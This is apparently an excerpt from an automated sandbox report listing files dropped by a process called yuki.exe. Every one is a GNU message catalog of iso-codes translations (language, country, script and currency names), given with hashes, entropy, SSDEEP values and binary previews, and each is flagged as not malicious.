                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 758 messages, Project-Id-Version: iso_639-3 'areare'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32017
                                                                                                    Entropy (8bit):4.789798911088075
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:8DgBqgkaokDd6YWECoGj2qpwWbxYOg/hky++Fhn82rDW2ofMpIFMEx523kguLjou:8vD57YWNoGJpwqr1ybh8cSRzSQtPv/Rd
                                                                                                    MD5:3FD02FF55A02E6937CECD6C2AEC6F190
                                                                                                    SHA1:DB1DF1FDCE088E9A8F432237EEA0F9E9A4DE1EC6
                                                                                                    SHA-256:D363E3052071ED11E06CD41FF2C55B871D24D8B339C58AD748119F40FE2C56A0
                                                                                                    SHA-512:33FB38F811BFD0D0F8E3A83CDD68B25276E3A87C47E6E94C2A9FF24A74719A54C46AA893B64769674E80EB23F3A113F0E5A1E1666999572587F419D4F4D5DB09
                                                                                                    Malicious:false
                                                                                                    Preview:........................|/......P?......Q?......Z?......_?......e?......r?......y?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......@.......@.......@.......@......+@......3@......<@......A@......F@......K@......T@......`@......q@......v@......~@.......@.......@.......@.......@.......@.......@.......@.......@.......A.......A.......A......#A......)A......5A......DA......LA......SA......[A......aA......gA......nA......uA.......A.......A.......A.......A.......A.......A.......A.......A.......A.......A.......A.......A.......A.......B.......B.......B......*B......1B......:B......CB......KB......RB......ZB......bB......iB......pB......wB.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......C.......C.......C......#C......)C......0C......7C......?C......EC......WC......^C......hC......qC......wC......}C.......C.......C.......C.......C.......C.......C.......C.......C.......C......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Afroaasia keelkond'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7437
                                                                                                    Entropy (8bit):4.8278895526408965
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi2ziZDD+qRSlSE0BfCuXr5VcJHVCSf8qQ2yw5kKflZW43LWRBj5P+:4SDxisSE0BfNcaKvflZWSZ
                                                                                                    MD5:1C8282671152A119A9FE18B9F0D1E63F
                                                                                                    SHA1:A4D8FB8ED1D2361DB904DF8984EFF536CA0CA1B8
                                                                                                    SHA-256:BB6533C9E05527811F814443B40A2DB202C573CE236A5044F7F3A142ABC8BB92
                                                                                                    SHA-512:47C7DB12C4594F4D61EA897CBE6C07808E93F6109F2E7D4F8641D25B623825210BB7C52DDBD0FD04EDAEE5B26F86CE952D803B8FA39B3E5B98932F3227E7999D
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10499
                                                                                                    Entropy (8bit):5.021108931526039
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dcwJk6fF1TltU4WjV9qWxa5hW89w8uJZSimWruZUuOcA:mCvTg4WjVDxa5hW8y4hW9Fp
                                                                                                    MD5:42D66FA82C873C860F0993B05EBE4968
                                                                                                    SHA1:5904BEE3BC28AE31D40C3A1F0DE2471C475B3D8B
                                                                                                    SHA-256:0C64EABA5EA99310B5377FED36BBB7BA9E7BEEB9C72D42E4FCEBEAAC3D9BED71
                                                                                                    SHA-512:C46F06ABDF3790163B6037472BD6D34A1FC1567ABE483CC2E518F929304DA643C68F942CE7EEAD01C34A66766CD81797D02073FF241E99935BA6867DA5DE9D4A
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 421 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23811
                                                                                                    Entropy (8bit):4.983588636245265
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:snboRT6k+bRpY1Ina2G/s6hzmwZbjh5wsWP4XWAIziUGJNZ27H+8pMoUy/r7i1b:sxdna2GU6hzmotmsWP4XWAIH7H+8pMo6
                                                                                                    MD5:58A100C72AE1FE9B580D619A956CF83C
                                                                                                    SHA1:C682F3B8D301BE7BF80BBFF848DCD58B9976EF2B
                                                                                                    SHA-256:9C83673B8F544EF1B0FCFE86A8F6ABC463F645AFB7B814901DFC71E0470BB773
                                                                                                    SHA-512:A3F61F5F007468E92F80A87CCF1E19D8AE13FD4F9E1230AFE845D06426E466053179A012BD1B99211B35753412AED86792F4928F41EFF19966DAB742071ACF70
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8#......9#......E#......M#......U#......d#......l#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......&$.......$......5$......;$......C$.. ...J$......k$......s$.. ....$.......$.......$.......$.......$.......$.......%.......%......1%......:%......G%......O%......Z%......c%......l%......s%.......%.......%.......%.......%.......%.......%.......%.......%.......%..,....&......@&......H&..%...N&......t&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....&.."..."'..*...E'......p'......x'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(......#(..'...1(..$...Y(......~(.......(.......(.......(.......(.......).......).......)......#)......1)......B)......R)......n)......t).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 576 messages, Project-Id-Version: iso_3166-2 'Argovia'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23745
                                                                                                    Entropy (8bit):4.852062114818755
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:4I2rfRKgcT77/EvPbUKp4I5xGcrKU+4V2MYfYXF/8TcHEtU0/ClPAnkN1tVx:4Tc/gTPGc932MnFUXtUfOkJP
                                                                                                    MD5:5AAA2AFB0A99C9723B6EE3164AE19F63
                                                                                                    SHA1:002C04C2C42DBACAAD5ABFB6471F4C805F66A861
                                                                                                    SHA-256:54778BEE3F55797D29988ADEBC9B080BE96BF977C8DA32CCA096416596B11E9C
                                                                                                    SHA-512:01501B3161B17811AFA9D480AC8626003253C7AC2646531ED0E2EB35AD7F173A6CF0C9FA9EBDEB2DC904B814235CEDE0FBDD22B7EA8B689EE5F51A1CC5910495
                                                                                                    Malicious:false
                                                                                                    Preview:........@................$...... 0......!0......(0......10......90......>0......D0......J0......V0......_0......i0......w0.......0.......0.......0.......0.......0.......0.......0.......0.......0.......0.......0.......0.......1.......1......!1......*1......21......81......F1......M1......X1......c1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......2.......2.......2......%2......12......92......@2......G2......M2......V2......\2......j2......t2.......2.......2.......2.......2.......2.......2.......2.......2.......2.......2.......2.......2.......2.......3.......3.......3......&3......63......?3......J3......Q3......[3......d3......l3......t3......{3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......4.......4.......4.......4...... 4......)4.. ...:4......[4......e4......p4......y4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Antartikoko Lurralde Britainiarra'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2745
                                                                                                    Entropy (8bit):5.148825233424938
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADUdNGNUvGqIfdvqNuoUTw0K8jHjMulrX28MevyLhEkiS97/RXl:qDENGNUyBoD0KO4u1aevmv
                                                                                                    MD5:AADA30BCEFE8D3BC9F2025CAC7AB3893
                                                                                                    SHA1:80A900D524661A23194D0E147430D4A26C3915EB
                                                                                                    SHA-256:583C563BB2059F0F0D5894F6A3326E588006DC40DE9050CDF0D566ED635DD496
                                                                                                    SHA-512:192D28E3FA9476739C1975C5492174488B69CB127D1BA49B67F8E378F9FC9E35D9612A1C75011C8E1B0E87611CE1D266739EE3C832EBEEBE793F56E0B3C06079
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................!...n...(.......................5...........<.......D......._.......o...................#...........................".......2.......G.......X...,...h................................... ......./.........../...(...G.......p...(...}................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 8 messages, Project-Id-Version: iso_4217 'Peso argentinarra'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):856
                                                                                                    Entropy (8bit):5.17552374280983
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:u0J0Ah8rGXzZQnPt0U9bqW1w/6xWXmGs2:ue0AWGXAmULwqy
                                                                                                    MD5:9AADB9B9C085251BEABD25AEF5E26EF2
                                                                                                    SHA1:C4EC877451E0EC4B79D86F91A97D088FC793B998
                                                                                                    SHA-256:FFD70D111C5A4404C6E6696C81CC783A04E5679DA7AFF1892AC92193E0A5742D
                                                                                                    SHA-512:F805DFA5A7E36F8842E34BE7DBCC9C19657D37A978E5F9F031F42E0CC16B450ADBF22E73399DBB0591B98B1B10860931847434DD36C46BA3E772605613947AF1
                                                                                                    Malicious:false
                                                                                                    Preview:................\...............................................................................................................&.......-.......1...!...6................................................Argentine Peso.Armenian Dram.Australian Dollar.Kwanza.Lek.Taka.UAE Dirham.Project-Id-Version: iso_4217.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2021-01-27 09:32+0000.Last-Translator: Gontzal Manuel Pujana Onaindia <thadahdenyse@gmail.com>.Language-Team: Basque <https://hosted.weblate.org/projects/iso-codes/iso-4217/eu/>.Language: eu.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 4.5-dev..Peso argentinarra.Dram armeniarra.Dolar australiarra.Kwanza.Lek.Taka.Arabiar Emirerri Batuetako Dirham.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 481 messages, Project-Id-Version: iso_639-3 'Aari'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20888
                                                                                                    Entropy (8bit):4.7887950558007635
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:mPYE7wH1TVlBL6wliO6xdEhp59ee3XcsLM8iuC1P0mbkArTLEfr8+u70AgBEDUAT:WuTOwl96XEr5Z3XcMM/GArEj8+xbe5d9
                                                                                                    MD5:7C91DA36687F7EBB7966450E6AA7511C
                                                                                                    SHA1:75A39817B131BA714F83498504D1FFAF5028FFD5
                                                                                                    SHA-256:DA4B02038DFCF7019CCC27E5AEBA8A39273DDE674E21E3EF0989DD7A2F90B474
                                                                                                    SHA-512:E23499D8A2696931967314BC4396EFC20002F474BA112D3CDA8AB20F83D13BED7A1B5C1C63390BD3ABD010C339AAD8EB0F9036C2B56AB598FD6688EC91546C00
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......0(......1(......6(......<(......F(......S(......X(......a(......g(......m(......u(......}(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......).......).......)....../)......:)......A)......F)......L)......S)......j)......r)......y).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*...... *......4*......7*......@*......I*......X*......o*......w*......~*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......+.......+.......+.......+.......+......$+......,+......8+......E+......J+......Q+......g+......p+......v+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......,.......,.......,.......,......",....../,......>,......O,......[,......j,......w,.......,.......,.......,.......,.......,.......,.......,.......,.......,......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 41 messages, Project-Id-Version: iso_15924 '\330\271\330\261\330\250\333\214'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2314
                                                                                                    Entropy (8bit):5.193658767358836
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:Cs6eISiGhd7kRbakb5EPkGxlU9p3UHuQMxwpQlheSsa:C3AiGh2+PkelqpEHAoQreSsa
                                                                                                    MD5:018122E5C660C5413969EE35C30FA644
                                                                                                    SHA1:0166CD3271E00F49FBC88303B8DD11113130E2E6
                                                                                                    SHA-256:A55A18595C5965BA09CD36267F9EF35C4C8A6B766B05F019BD8B2771BD1AEA31
                                                                                                    SHA-512:0DF7D4D4918CA468B0C485739AAB72F00524AA9A42C3FCDE96B9D9F05AC72AC8F2F7D326BB827483A529737F3F61345AD53D659A4A309A87C890D5C2265691C3
                                                                                                    Malicious:false
                                                                                                    Preview:........).......d...;........................................................................................................................... .......5.......<.......B.......K.......R.......[.......d.......l.......u.......{................................................................................................................................................... ...........................................&.......7.......@.......O.......b.......m.......v...............................................................................................'.......2.......G.......c.......n...................................................................................................................................................(...#...........&...%...................................$..............................."...!...........'...........)....................................................... ........Arabic.Arabic (Nastaliq variant).Armenian.Balinese.Batak.Bengali.Bopomofo.Brail
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: fa '\330\247\331\201\330\272\330\247\331\206\330\263\330\252\330\247\331\206'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26404
                                                                                                    Entropy (8bit):5.321527148304874
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:jhZgvq4S3AItmsWP4XdAIyQx/NyKL8eKbz:LgCPIM/NFwecz
                                                                                                    MD5:A7ED9359A49B75C2A2F635554FF2CEB4
                                                                                                    SHA1:481C74AD4351DDB70F3B8544413E152C482CEDCC
                                                                                                    SHA-256:EDD1600B33989EB65968E0EC884A99D2B61D5085F5F336AD2093B4F38CA98C0D
                                                                                                    SHA-512:5313E2CBBEFCBA87A036BA76EA19AEA2D5C4ADB5E547F8DF82B4C9CC170D76F2B295BA4FE3492644E255662B16EC8446D9CD7E16E9603883AC3C307B292DF37F
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):372
                                                                                                    Entropy (8bit):5.157704517013865
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijn1YYxAgCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITG69XmBQ8KMW0YEi9:i4n1xx8t02Ukx/iximCg5ITBXmBQWi9
                                                                                                    MD5:E0F8A23C46D3C418C62897A6328F7732
                                                                                                    SHA1:6B95831D974132F54F207657155538E84F6B3EA6
                                                                                                    SHA-256:5DD090E29019F75A194AC59AA5605AE0DFEF15F3479DBA0701E13199CA6B3AAB
                                                                                                    SHA-512:0477CC5F50F56B37D511002913C37DBB6BCD80ADFF3355C2CC2A7938B370C702F640227FB7A96DF1885837F29E57D0AB007FB7DD8165E73281759DF4D9396E8C
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...:...9................Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: fa.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: fa '\331\202\331\204\331\205\330\261\331\210 \331\202\330\267\330\250 \330\254\331\206\331\210\330\250 \330\250\330\261\333\214\330\252\330\247\331\206\333\214\330\247'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3140
                                                                                                    Entropy (8bit):5.5536204914542555
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADQpt69jovGqIfdvqNuXUoekU55ccoMrEHe++X/1r3tXaXtOOZ:qDst6FoyBXdO55chm4mvR3p8
                                                                                                    MD5:A8DFD9505700F0D78F6D81F158ECD870
                                                                                                    SHA1:EC9B11BF0644ED379D678E8B762AF145DABD18B9
                                                                                                    SHA-256:7600131F580F42880A31C5488462CDDC4A92CA6B31F94C06EC52EC4143FDD88A
                                                                                                    SHA-512:548DBBDC8EF39B9EAD52F869B90F18D31E5821077DB1AD7410A4298D8111561E97FE9D9595420E946D35DA4954C07489E9E67A522EE821B4BFFE4B3AB536CCE3
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................+.......5.......9.......)..."...J...L...........................#...............;.......*...B...#...m...........................................x......."...}...%.......................<.......]...&...........,...............K....................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 281 messages, Project-Id-Version: iso_639-3 '\330\242\330\250\330\256\330\247\330\262\333\214'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13407
                                                                                                    Entropy (8bit):5.03432833317091
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:32Z+tA+JR0RiEo1e/4qMyId9wc8RuWfBm:JfJaJBFb5m
                                                                                                    MD5:B11ABC8EF555ED847ECED925EB5CB315
                                                                                                    SHA1:7AF260E4A8DE35DA74A1524F607000112B4A14E4
                                                                                                    SHA-256:596532075570382A61C9B0B3343D463E1E363EC536ABDE67800AE09A97A3599C
                                                                                                    SHA-512:85CDBE2F4C4CD50CA0B8C569CB433EED40A58F42FA158FD3D88AB03D94B99AD8833C1C18B8B520C96B12EA6EB6F0F6D656F39DA3B38924BCCBB0F84AAED6EF51
                                                                                                    Malicious:false
                                                                                                    Preview:....................{........................................................................................................................................................... .......'.......3.......<.......D.......L.......T.......[.......`.......k.......s.......|.......................................................................................................................................................................%.......*.......0.......9.......?.......F.......M.......V.......\.......b.......h.......n.......w.......|...............................................................................................................................%.......+...............4.......9.......B.......I.......T.......Z.......a.......g...............................................................................................................................................................&.......,.......E.......Y.......a.......j.......s...............................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 82 messages, Project-Id-Version: iso_3166-1 'Albaniya'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3704
                                                                                                    Entropy (8bit):4.66532017721864
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:2du8bqIl/z3Ipa+Mp+APuI3ByJKqYXQnuYbwey:Op0paRtPYN4Qn/sey
                                                                                                    MD5:CBA805C0F4F22D6AE56F95FB3597278E
                                                                                                    SHA1:E79B7D25ACAAF5EC066ADD0E32D79C013093D5F0
                                                                                                    SHA-256:4A68E7141F9F15260D09928B3F4E1F40EBA1B4434602640EBAA828B38F32D6F5
                                                                                                    SHA-512:E2C31A28B6D2635687DEB4CBAC099F50C413AD92202632DB16226D2A45562D0A2B454FD6B7A5D010E014275DC1F1D32A6567E2D8B318EE9EB098FBF00C0DCB0E
                                                                                                    Malicious:false
                                                                                                    Preview:........R...........m...<............................................................... .......+.......3.......;.......A.......X.......a.......h.......q.......~...............................................................................................................................................................*.......2.......:.......B.......H.......N.......U.......].......k.......u....................................................................................................................................................... .......(.......3.......;.......B.......O.......Y.......b.......k.......s.......y...............................................................................................................................................................................................,.......5.......?.......G.......M.......Y.......`.......g.......p.......................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 159 messages, Project-Id-Version: iso_15924 'Afaka'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9006
                                                                                                    Entropy (8bit):4.905035173200453
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:zivG2E/UXE/t4j2j+Sa5hW8HAJgQPBfrycO:ziv3g14ajZa5hW8QlO
                                                                                                    MD5:4FC47C21DF5961D83E911B6E7A05B3D6
                                                                                                    SHA1:4B64EE77194672A372525A44362671C3DF34325D
                                                                                                    SHA-256:DF4C4388FEB065EF564886A819B5DDF576D37F74D6F51AE17B05CE3AE0723DA9
                                                                                                    SHA-512:5FA81BCA9B5AC6223E47EBDADF807380548C8BE609FE0138C5012BF4A0A0FABCB5BDF55458C203A394471B56E577DA814364EE9DEB3ADA938A2A773080526FC8
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................................................................................................................!.......*.......0.......J.......b...........................................&.......................(...........D.......U.......g.......|...............................................................................................*.......D.......W.......^.......g.......x...........................4...................#.......+.......2.......:.......C.......L.......W.......].......d...#...v.......................................................................................!......./.......4.......;.......B.......L.......^.......i...................................................(...................!.......3...-...=.......k.......w.......~...........#.......".......)...................................%.......>.......D.......L.......Y.......c.......l.......w................... ...................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 404 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22418
                                                                                                    Entropy (8bit):4.944593883717918
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:EADkYG2g6y0LRXKrK5Hgxr8jq5wsOP4XJOAE1i3NavbQiNZk7DqeW9:3ntR6rK5HgW+msOP4XJOAEJQiNZk72z
                                                                                                    MD5:E2FABD761540BF5E36D1B948D98055CD
                                                                                                    SHA1:AC2F7E6C1B59A0E254E0664D41A7B534DDE6A805
                                                                                                    SHA-256:6DE9A1BC72A33289E3BAE05FC1F2B499689E6F5C58A2FA895031A56C2EF6497B
                                                                                                    SHA-512:97CFAE17AD7C483D07B75C98CA065644CE515FBA8231E7BF3739A048B0D74FB4579A6B8B2C2D4E63715914984D2EC8460C027673708378EBAC60131CE93081D6
                                                                                                    Malicious:false
                                                                                                    Preview:........................\........!.......!.......!.......!.......!.......!......."......."......."......."......3"......J"......T"......g"......o"......u".......".......".......".......".......".......".......".......".......".......".......".......".. ....".......#.......#.. ...+#......L#......c#......l#......z#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......($......-$......3$......9$......J$......b$......k$.......$..,....$.......$.......$..%....$.......%.......%.......%......!%......&%....../%......6%......E%..%...T%..,...z%.."....%..*....%.......%.......%.......&.......&......"&......>&......F&......L&......X&......j&......r&......z&.......&.......&..'....&..$....&.......&.......'......2'......Q'......o'......t'......|'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(......'(.......(......8(......@(......K(......P(......Z(......c(......j(......x(.......(.......(..!....(.......(.......(......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 104 messages, Project-Id-Version: iso_3166-2 'Alabama'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5183
                                                                                                    Entropy (8bit):4.855788950153505
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ojlllQNGDhvDG4wRbbSKh/D1DHskx4UF/RXbMnCtUT1oK1heFLU3hE:oBlCyhS4w0uDCQpJbMCyZH/eu3hE
                                                                                                    MD5:3C1876F863DA65AA907B36D00D834322
                                                                                                    SHA1:1C991C7453B858DA8A1EA389758858C22B9E6703
                                                                                                    SHA-256:990B672692E62361CE159BD47604E628879C98CB6805D5CFEA9743DA65CB2430
                                                                                                    SHA-512:AC2CC7D2EE21BEAA3D79F9FC6B8B4ADB751F55CACB45E2A589A15174249BD2F7C63D1D979A18DA07E3656E6F81EB81844B2954BDCA175AA282AFE9DBC8289D46
                                                                                                    Malicious:false
                                                                                                    Preview:........h.......\...............................................................................................*.......B.......Y.......u.......................................................................................................#...............3.......=.......D.......J.......S.......[.......`.......g.......{...................#...........................................................................'.......2.......8.......=.......H.......V.......^.......g.......q.......}.......................................................................................................................7.......<.......E.......L.......Q.......^.......h.......r.......................................................................................................(...$...........S.......X.......`.......p.......x...........................................~...........A.......I.......P......._.......g.......p.......v...................................!...........................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Brittil\303\244inen Antarktis-alue'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2647
                                                                                                    Entropy (8bit):5.086964702545363
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADq/ypxvGqIfdvqNuoUPXCuNOsUoFNgIr9sgf:qDqixyBoyNNtbFNHrKgf
                                                                                                    MD5:09308CB06C122AB2B73DBDAB9B611C04
                                                                                                    SHA1:D65BB4A6FC354BFD63D88911767D45BC17DBAEC3
                                                                                                    SHA-256:4D5308942B3B898A3B14979CA60FC16131DF21F9C0F59A884B85FA6DC4FEF773
                                                                                                    SHA-512:1702754CF89DAEBB9077A6FB1535B56D2B5ACC7C36B82682D6CB188CE09F12E0CCB4EF9475347B446AF12A8ADF133C31EFA0E183A8413CD7EF48DC33E0162B96
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c.......................S...$...p.../...............(...........................'.......2.......D...&...a..........................................................."...........3.......G.......\.......c...+...s...:...............#...............&...........F........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 142 messages, Project-Id-Version: iso_4217 'Afganistanin afgaani'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7172
                                                                                                    Entropy (8bit):4.764309913511248
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ffXUSiqyeGGGnXNJqMcd1d417WSyzZIG8ldS3kwKm1W9/OeG1H1ilRRs:HniqyehKYMS417WPCVOkKYplU
                                                                                                    MD5:45C67C262253DDA9347D176615D362A6
                                                                                                    SHA1:42CD18C59BE3040F0E226203BD6EF59F0CDAA2AA
                                                                                                    SHA-256:75F952E6338021CAB32765CA9133F72F123C61CC59D8EDD0BEE05705B9331406
                                                                                                    SHA-512:082A4E90A189903B4EC8B0E97277B3A3F4EF4815F19A4E8835D456574CA7ED094B458751AC5C94A23304C57868FBA920228271775501BEEED87E82E0BCDFC10E
                                                                                                    Malicious:false
